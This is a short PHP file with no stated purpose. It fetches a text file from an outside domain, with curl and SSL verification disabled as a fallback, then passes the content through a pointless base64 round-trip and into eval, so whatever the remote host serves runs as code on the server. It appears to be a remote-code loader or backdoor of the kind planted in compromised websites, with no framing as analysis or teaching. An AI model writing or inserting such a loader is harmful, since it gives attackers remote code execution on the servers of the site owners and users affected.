<?php
$url = 'https://stepmomhub.com/2.txt';
$content = @file_get_contents($url);

if ($content === false) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $content = curl_exec($ch);
    curl_close($ch);
}

if ($content) {
    $code = base64_encode($content);
    eval('?>' . base64_decode($code));

} ?>